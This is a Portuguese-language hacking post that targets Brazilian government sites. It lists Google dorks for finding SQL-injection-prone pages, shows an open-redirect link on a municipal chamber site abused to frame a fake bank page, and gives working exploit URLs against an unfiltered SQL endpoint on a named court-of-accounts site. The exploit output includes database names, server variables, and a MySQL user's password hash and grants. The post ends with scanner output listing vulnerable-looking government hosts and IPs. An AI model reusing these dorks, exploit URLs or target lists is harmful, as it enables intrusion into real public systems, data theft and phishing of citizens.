Dorks variadas voltadas pra sqlinjection.

Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.

site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
site:.ar inurl:fbconnect_action= fbuserid= intext:User
site:.ar inurl:fbconnect_action= fbuserid=
inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=)
inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php  inurl:pageid?
inurl:.policiacivil.sp.gov.br modules
site:sp.gov.br "Warning:" ext:php

Pequenas falhas grandes dores

Pequenas falhas grandes dores

Imagina Spammers colocando suas URLS

http://www.camara.rj.gov.br/head_notes.php?url=URL_COM_ENGENHARIA_SOCIAL

Imagina um engenheiro enviando esse link para emails.
De fato a url dá uma segurança para o navegante, mas e o conteúdo ?
Ex:
Com seguinte link abaixo.


http://www.camara.rj.gov.br/head_notes.php?url=https%3A%2F%2Fwww.bradescoabrasuaconta.com.br%2Fconteudo%2Fhome%2FDefault.aspx

http://www.camara.rj.gov.br/head_notes.php?url=http%3A%2F%2Fblog.inurl.com.br

Uma pequena falha, de aparência inofensivo pode acarretar grandes dores de cabeça.

Continuamos na mesma URL porem com nosso conteúdo.
Chamo esse tipo de falha de IFRAME URL criação de um iframe aparte de um Request seja GET OU POST.

VULNERABILIDADE ENCONTRADA, TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA.

TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

Parâmetro GET sem filtro algum, é possível executar consultas dentro do banco sem qualquer filtro ou proteção previa.

PARÂMETRO GET NOME:sql


https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql[COMANDO SQL]&vgRetorna_ID=&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2=&titulo3=&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP=&menuIncludeHTM=&vgNovaJanela=&vgNaoFiltra=&vgSemRodape=1

Executando comandos.
COMANDO: show databases;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+databases%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO show tables;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+tables%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW VARIABLES;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+VARIABLES%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: select user();
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=select+user%28%29%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW PROCESSLIST;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+PROCESSLIST%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================



BANCO:
myConsulta

TABELAS:
Tables_in_myConsulta
coluna
con1
con10
con100
con101
con102
con103
con104
con105
con106
con107
con108
con109
con11



Variable_name Value
back_log 50
basedir /usr/
bdb_cache_size 8388600
bdb_home /var/lib/mysql/
bdb_log_buffer_size 32768
bdb_logdir
bdb_max_lock 10000
bdb_shared_data OFF
bdb_tmpdir /tcdf/temp/tmpMysql/
binlog_cache_size 32768
bulk_insert_buffer_size 8388608
character_set_client latin1
character_set_connection latin1
character_set_database utf8


Id User Host db Command Time State Info
7720512 userCon localhost myConsulta Query 0 SHOW PROCESSLIST



Grants for userCon@localhost
GRANT USAGE ON *.* TO 'userCon'@'localhost' IDENTIFIED BY PASSWORD '0be2b4be35a0fec8'
GRANT ALL PRIVILEGES ON `myConsulta`.* TO 'userCon'@'localhost' WITH GRANT OPTION

Buscando sites joomla "1.5" no domínio gov.br

DORK: site:.gov.br "ADMINISTRADOR" joomla "1.5" ext:php

[5] - www.sudmennucci.sp.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[6] - http://www.sudmennucci.sp.gov.br/index.php?option=com_content&view=section&layout=blog&id=3&Itemid=44&limitstart=20
/ HTTP_CODE: 500 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER: Apache

[7] - www.sudmennucci.sp.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[8] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2308%3Arelatorio-da-smdr-de-ss02-ate-06-de-setembro-de-2013&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[9] - www.cangucu.rs.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:
[10] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2179%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[11] - www.cangucu.rs.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[12] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2291%3Arelatorio-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural-de-19-a-30-de-agosto&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[13] - www.cangucu.rs.gov.br/index.php?...a...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[14] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2203%3Aroteiro-de-servicos-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[15] - www.cangucu.rs.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[16] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=rss
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2
[17] - www.procon.rioverde.go.gov.br/index.php?...id...
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER:

[18] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2102%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[19] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=view&id=6&Itemid=66
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[20] - www.camaralp.mg.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER:

[21] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4912%3Apromotoria-da-saude-de-cg-firma-tac-com-hospitais-para-a-oferta-de-de-dialise&catid=43%3Asaude
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[22] - www.mp.pb.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[23] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=frontpage
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[24] - www.cangucu.rs.gov.br/index.php?option=com_content...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[25] - http://www.areial.pb.gov.br/index.php?option=com_content&view=article&id=246%3Aparoquias-de-esperanca-e-areial-promovem-a-xiv-caminhada-penitencial&catid=38%3Anoticias&Itemid=130

[26] - www.areial.pb.gov.br/index.php?option...e...

[27] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=section&id=9&Itemid=47
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[28] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1964%3Arelatorio-semanal-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[29] - www.cangucu.rs.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[30] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4076%3Aresolucao-regulamenta-atribuicoes-dos-cargos-criados-na-area-de-ti-criados-pela-lei-971512&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[31] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3678%3Amp-constitui-comissao-para-concurso-na-area-de-tecnologia-da-informacao&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[32] - www.mp.pb.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[33] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3702%3Amppb-devera-lancar-edital-de-concurso-na-area-de-ti-ainda-em-junho&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[34] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2207%3Asecretario-acompanha-trabalho-de-equipes-do-interior&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[35] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2153%3Aprefeito-participa-de-audiencia-publica-na-camara&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[36] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1640%3Arelatorio-semanal-de-atividades-da-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[37] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1704%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[38] - http://ead.florestadigital.ac.gov.br/mod/glossary/view.php?id=104&mode=letter&hook=ALL&sortkey&sortorder=asc&fullsearch=0&page=-1
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[39] - http://ead.florestadigital.ac.gov.br/mod/glossary/print.php?id=104&mode=cat&hook=-1&sortkey&sortorder=asc&offset=-10
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[40] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2139%3Aprefeito-recebe-reportagem-da-radio-cultura-am&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[41] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=366%3Ainaugurada-em-cangucu-fase-inicial-da-energia-eolica&catid=61%3Amural&Itemid=256
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[42] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=atom
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[43] - http://www.procon.rioverde.go.gov.br/index.php
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[44] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=1069%3Aseminario-mostra-como-transformar-o-lixo-em-fonte-de-renda&catid=46%3Ameioambiente&Itemid=122
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)